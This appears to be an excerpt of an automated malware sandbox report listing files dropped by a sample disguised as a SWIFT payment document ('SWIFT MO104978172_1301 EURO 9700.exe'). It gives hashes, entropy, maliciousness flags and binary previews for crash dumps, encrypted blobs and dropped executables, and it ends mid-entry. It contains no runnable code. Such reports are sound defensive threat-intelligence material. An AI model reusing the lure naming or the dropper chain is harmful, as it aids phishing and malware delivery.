            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.9.2.0.1.5.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.9.8.8.9.0.0.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.0.0.2.f.a.5.-.e.b.3.9.-.4.2.3.6.-.b.5.9.e.-.3.d.7.e.f.5.8.2.6.9.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.e.e.1.9.0.1.-.a.b.1.3.-.4.2.4.7.-.9.c.1.8.-.9.d.4.c.4.2.d.1.3.9.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.y.h.b.w.g.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.1.0.-.0.0.0.1.-.0.0.1.a.-.6.2.d.a.-.1.5.3.0.4.6.3.7.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.0.6.7.e.8.a.d.2.9.5.c.5.a.d.c.3.a.f.3.9.e.1.3.3.a.c.b.6.f.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.d.e.2.2.e.2.e.4.7.e.1.5.a.e.b.4.1.c.1.d.b.a.8.b.0.c.d.1.a.6.6.9.2.6.9.3.b.!.s.y.h.b.w.g.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Mini DuMP crash report, 14 streams, Thu Feb 2 20:37:30 2023, 0x1205a4 type
            Category:dropped
            Size (bytes):38046
            Entropy (8bit):2.1641974095000274
            Encrypted:false
            SSDEEP:192:/6rfSGbZssOz4/aRu7O+TcHoFhPHDcJUskWf1T7WX:QFsjzWJ7O+TB58UskoE
            MD5:5EE28A959567FBB6B66B979D4C5A8406
            SHA1:9F3CBCB700B3296057282D70A9FF8C62C8B6F854
            SHA-256:3DE68AA7673E40BD115246B2BA8E9A5F8C09481A4FF8446E36A86F8597B6930E
            SHA-512:EEAD3C2F1A79D7FE77B3ED1EDCF700D2E1096435E86D9B87F7D1AA5963F50F794D78CBC4655B717D7A741EC4B7B244DDED984D5CF6C007BE5DBEAD9AE30D23F2
            Malicious:false
            Preview:MDMP....... ..........c........................(...............V,..........T.......8...........T................|...........................................................................................U...........B......H.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8314
            Entropy (8bit):3.6881449838294644
            Encrypted:false
            SSDEEP:192:Rrl7r3GLNiR662h6YDg6TvkGgmfkS6SIHCprI89bMZsfJGkm:RrlsNiM62h6Yk65gmfkS/MyfJM
            MD5:E42D0812B69300594A1F7E0E27D5FBC7
            SHA1:5A31B783C7D4FA363BE8C31987EDF0285D9AA640
            SHA-256:686F20BA93011B83180F12DD14380913B30D62D8609F78B0C40BCA9373655B5E
            SHA-512:D955758C31D0A3AA1F763B107657E91D1A44D63500C8FF6E2F7B612D8129B8DA9854720E3A19693EE6CA2690BB9703BC0E4C0925437CF34BE8DE366667AB3F52
            Malicious:false
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.1.6.<./.P.i.d.>.......
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4636
            Entropy (8bit):4.4168723801175425
            Encrypted:false
            SSDEEP:48:cvIwSD8zsTiJgtWI9H/Wgc8sqYj4M8fm8M4JC7fIFMf+q8vUfefpM9d:uITfMQugrsqYcxJsbfKeefpad
            MD5:E5AFFFB2CAF44FB12D2934C7803C6489
            SHA1:50B49FA1D33D353075022708783E59395582438F
            SHA-256:214CEF5C8431250CFEF5DE2346B6DA241A5C1BD80C11907070C34B357520C043
            SHA-512:496DCACBC9EFC0FEFDC8CCB3A75F5B6D059B5C95F39097988FF1C11E22F15676EBB5DB2E3477AD750860CEDFBAF8294AB743D69467248E9AB3E8176B1BA2CC39
            Malicious:false
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1895388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Mini DuMP crash report, 14 streams, Thu Feb 2 20:37:31 2023, 0x1205a4 type
            Category:dropped
            Size (bytes):38624
            Entropy (8bit):2.1553947089539003
            Encrypted:false
            SSDEEP:192:CFA5b9tD3X5V4OX4/WB7+K+T9CWj65INXCGzDvSMsnw0KLz:/XJV/XWsj+T9znNnalnwR
            MD5:D0427B8E00143999CA4F2922B7A178AF
            SHA1:0620D93E415B406904BF9140915BABC3D91EA6CC
            SHA-256:5F7B544457E452A2E8F6445965AEFBBB989217A9726F7D791B226C4C737A0DC6
            SHA-512:931893263033C5CDD9BE55E48CC9212D46820117E1356C74895FC69CE005FE4CCDE48769B2E3793751E9A44946597339ED5D3AD4D3EEC41E4F93FABC7B7B588F
            Malicious:false
            Preview:MDMP....... ..........c.........................................,..........T.......8...........T...........(....|..........0................................................................................U...........B..............GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8336
            Entropy (8bit):3.6910587723774455
            Encrypted:false
            SSDEEP:192:Rrl7r3GLNiD463B6YqxSUqm7gmfMSkHCprd89bVlsfqJnm:RrlsNic6x6YcSUV7gmfMS8V+fqk
            MD5:8D7359AA25CE7203E7CADD43D8EB3710
            SHA1:25243FAD639B8363D6D1BFD2E5076EDD1661A5E3
            SHA-256:A5C6659A6F2EB21F5386ECFB7901B4B153970032376C0BBDF0761402890FD98F
            SHA-512:C642C2AF91BBF7BFE441B2E1F56373CC3F148068F5A087594C7D27639128CC21729D06E2C15B4D5E80504CE6BD52BC6E607AF20BF23D9C4C57430081D6115D32
            Malicious:false
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.1.2.<./.P.i.d.>.......
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4643
            Entropy (8bit):4.414107065142114
            Encrypted:false
            SSDEEP:48:cvIwSD8zsTiJgtWI9H/Wgc8sqYjw8fm8M4JohIFYe+q8vehhotrLWd:uITfMQugrsqYxJileKc2ZLWd
            MD5:BC26F11846D6FC8645CC11118B6AC3B3
            SHA1:754C5B11E24EF905731BA53CD5C84C20D4BA51A7
            SHA-256:96E77F862F1A24895AAEABF39292E65DD04F03CC5791BEF0D1863F794903DBA8
            SHA-512:6A3DEC5FE543EA6F9B4B6DD2331810FE5FE4560F0BB0891F6BD0E22A9DE381CE442358A0F3B406E26E91DA346E8601978A66E64694E7063F97992B71B4A67DB5
            Malicious:false
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1895388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Mini DuMP crash report, 14 streams, Thu Feb 2 20:37:39 2023, 0x1205a4 type
            Category:dropped
            Size (bytes):43692
            Entropy (8bit):2.044994478573538
            Encrypted:false
            SSDEEP:192:606QhCBnQrSUdV3Oz4IWe+TcS3m6VXiMdDWIhNLZm98I+4n:1lSsQz9L+TRVNgE1Zgh
            MD5:92C9FA95B2F397E2052EF5CA665542A6
            SHA1:4841EDB0B141C7B443B4C8B4DC7758DB5B720D3E
            SHA-256:CF82D898C6662CE9DA9618DCC238E46A88CAD68DAAD53E24100BB28E4896D7A4
            SHA-512:976E0A74D47F12D29276E4F985CCD5FF0B49FEF4C17EDE73EB55F9CAF3F29635F5014E54D4F4C80DEFE77E3918A23BA999C2D8B10CEBBF82711EC0D99800E24C
            Malicious:false
            Preview:MDMP....... ..........c........................(...............T/..........T.......8...........T............................................................................................................U...........B......x.......GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8332
            Entropy (8bit):3.6902966098775996
            Encrypted:false
            SSDEEP:192:Rrl7r3GLNizK6CI6YqeSUzngmfMSkHCprr89bdvsfjf/m:RrlsNie6N6YDSUzngmfMSqdUfj2
            MD5:146F95256EE9D4E81120E31D4902547E
            SHA1:105BC1B791E38777E3B8C110F3AF14703C555895
            SHA-256:DFA81926326028BF6599E9B2956AB19C1B7918334173B8C876267CC40AE19E72
            SHA-512:37DFE72B0CF3AEC3AEEF0C5873DCF74D86627ABE18D550AE6FFEB1C1C0B1795CC9D403024F1B9B41841DEEC6C751625F4F883046D0D1E144B62BCEE31F281221
            Malicious:false
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.0.8.<./.P.i.d.>.......
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4643
            Entropy (8bit):4.415251827162205
            Encrypted:false
            SSDEEP:48:cvIwSD8zsTiJgtWI9H/Wgc8sqYj+8fm8M4JohIFaS+q8vehDkQtrLqd:uITfMQugrsqYnJi7SKcDkQZLqd
            MD5:BAAD75B486A4F400F2D8A120D8B81F80
            SHA1:66009D86920D49536999163DF61DF2FC538A15F3
            SHA-256:631029B816E0A70FFC52C90CD53E668B50F187E1DDBD68D2B0ECD164A6C9ABA5
            SHA-512:A40C1E7C02507D15D338E90F68670C0618EF8A5D3D31026C680ACEE75A3AD23F1E859517ECEA039886A9C23CE0E0C925957ED6BCD65DEB10A806F0FFDB2C96FB
            Malicious:false
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1895388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
            Process:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1216
            Entropy (8bit):5.355304211458859
            Encrypted:false
            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
            MD5:69206D3AF7D6EFD08F4B4726998856D3
            SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
            SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
            SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
            Malicious:true
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
            Process:C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
            File Type:data
            Category:dropped
            Size (bytes):237374
            Entropy (8bit):7.998112883112987
            Encrypted:true
            SSDEEP:6144:jF29qcPaB7ksLg83//JcHWCIi1k7kcUwgoLv4:jF29bPaB7N3//Jc2CIMk7MZQ4
            MD5:1A93967010DDDAC93DCA6397716DD4BE
            SHA1:31C59D05490DDFBA29CE06FFD440C4530507CDB8
            SHA-256:53C3AED5183A52363131BD0857EB8CFA3FF553C8D84147C7CF5C7B0979B87C8D
            SHA-512:41AACC9988E4FDD151576FCD0ACB94144D1C7834B693E5795166BCF6B742AED4F74BB441F54D1EC56EFA16CC5DC8DABB95D2D35049375CEC1D83CC9D030653BF
            Malicious:false
            Preview:OD...Q0..Tt{H.........RI.F../C..5....U........7.J..0......^Y.u.B..h.:.>..K.8...4.}M9....1...v..Z>.....T=m....'..%....B..H......Xp.G....D..@..|.....K...u.....n^q.....].0~...L=..H@FRU...#q.%.?s2.....LV.=`.>......KH.o.&.........+J......`.A=..rM..e...Q0.J;t{Ji.p....RI.F..7C^."1.h..f......K....J.....e...YqC.BBl...&...r..9..5...n.J....D{...J.........=J..2..p...q..H.M...IoMP..T...H.Oz#.A.....n.. ..O.....:U.......c.\v.......i.Y%.6#..V.u.6.c,.S3.....?O.....%..[....B.#%,fT$.\.Y.suA=..rM..P....Q0.d.`{i)..E.....RI.F../C..5....U....@H.....J........^Yq).BB3..k&..Y.r.t.....R.J....D.W.K....G.=J...sA.....B..H.M...IoM.%b.....H.z..A.....n.. ..O.....:U.......c.\v.......i.Y%.6#..V.u.6.c,BO..a...?O.....%..[....B.#%,fT$.\.Y.suA=..rM..e...Q0.dTt{i$..E.....RI.F../C..5....U........7.J..0.....^Yq).BB3..k&...r..9..5.....J....D{..WJ.....G.=J...2A.p...B..H.M...IoM.%b.....H.z..A.....n.. ..O.....:U.......c.\v.......i.Y%.6#..V.u.6.c,BO..a...?O.o8V.y.....<.
            Process:C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):76800
            Entropy (8bit):6.350070782699365
            Encrypted:false
            SSDEEP:1536:w/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIP/El3:w/9cIWcxTZ3km34EFkO8El3
            MD5:34037A20C292EAB6F90C3D9AB1334348
            SHA1:59EDE22E2E47E15AEB41C1DBA8B0CD1A6692693B
            SHA-256:A76B648B8D831810B5C0A1F0F9C4A4F67809679C12429DC7E576CE45B6CD1AAF
            SHA-512:CBB0DB98BA8D3C615E79358AEA82809FD28C41254AEF929DF7921FB025646006FA160AA8E25F52B75481F2054EABEF0B869647403016C2B9C998081028660B9E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.|.v..Vv..Wv..Vvdr.v|.Vvdr.v..VvRich..Vv........................PE..L......c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
            File Type:data
            Category:dropped
            Size (bytes):333839
            Entropy (8bit):7.717717332714017
            Encrypted:false
            SSDEEP:6144:RF29qcPaB7ksLg83//JcHWCIi1k7kcUwgoLvtnBkizxTZUm9FTvl:RF29bPaB7N3//Jc2CIMk7MZQpB/zxTSu
            MD5:AB0658A8B410A38974A8D603B6C7ADAE
            SHA1:B0CC2CBB0968D7DD74DBB48A1A895B0F1B4FE070
            SHA-256:CAE2738F0D77621B31067C4A94ED2912DF7BBD5EE410D9BFB9F9B126BB592DCA
            SHA-512:761DEF1B30DA10EB2B7EBF3EF781911F57E3A58811B688061E823BB6098423BB4D32E06360205559E814AAC71D628A89843670335B5C835C0862A57C10AA6136
            Malicious:false
            Preview:.-......,...................k............,.......-..............................................................................'...........................................................................................................................................................G...................j...............................................................................................................................N...........>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
            File Type:data
            Category:dropped
            Size (bytes):7973
            Entropy (8bit):7.189921371635948
            Encrypted:false
            SSDEEP:192:darcitQvArWiPvsnb9JmKeVFlptFRbUJ4dLVWyduotC8MmLh:uCYrNPvsbWdVFfb44xViPTm9
            MD5:F12DC03CA4C7762CEB36825044F19D37
            SHA1:547877F2C2B1F91A68398E1E6B14A39E86133839
            SHA-256:98E4CEF3D032A40FF9DAF4C255B04F38C64FF5957CEC2D1C70D3E66C7FC8454B
            SHA-512:527DCBE916E633B03667DED10EE467AE53715C00DCBA759C438CAF6E7B434A92869C203BEDAA848012E5FF62851F18008302D49B27D1D963BFB354E4613B32F1
            Malicious:false
            Preview:.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O
            Process:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
            File Type:International EBCDIC text, with no line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):2.75
            Encrypted:false
            SSDEEP:3:HG:HG
            MD5:60F71EE552914280296808616C64568F
            SHA1:D43B44FBB6053FD1C0C65082248C4AED87470FD5
            SHA-256:9765A68153B41503C331FDA996BEF7065635F5B3F9DF510710306B2FCC743DFF
            SHA-512:AFDCA863799D3CF995C44434DC6ACBD857589F1EC2406B3F2441A55CD9B02538AD078670960EDF3002575079483DEE7485836A704BFE93B1F5C555DA4147C6AE
            Malicious:true
            Preview:...H]..H
            Process:C:\Windows\System32\wscript.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:dropped
            Size (bytes):320087
            Entropy (8bit):7.933311892781397
            Encrypted:false
            SSDEEP:6144:/Ya60tuC5bG2DOeZGn19JzEVIOpxzF3SqqctwgYJ+LXtK:/YKt9bpOjnhotp9B9+giEXE
            MD5:E1EA8B4960D24E0E5742BBFCB3C0B240
            SHA1:4934275E71F844D2A8AD29C988DA11F09F3E255F
            SHA-256:3DDE7E20FF83EA53CBB96154F8CFF3CDA062E62F2BC377AC49D6695452E319AC
            SHA-512:8B3FD3EF831C942CD14EF3B9B0D943ECBA66B505F1A3E71AF47EBED6AD3B2B071FAEA0EA86F0D287138D4C3E27922D45EC5E37AB7C31BA041815271C62738DBE
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):76800
            Entropy (8bit):6.350070782699365
            Encrypted:false
            SSDEEP:1536:w/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIP/El3:w/9cIWcxTZ3km34EFkO8El3
            MD5:34037A20C292EAB6F90C3D9AB1334348
            SHA1:59EDE22E2E47E15AEB41C1DBA8B0CD1A6692693B
            SHA-256:A76B648B8D831810B5C0A1F0F9C4A4F67809679C12429DC7E576CE45B6CD1AAF
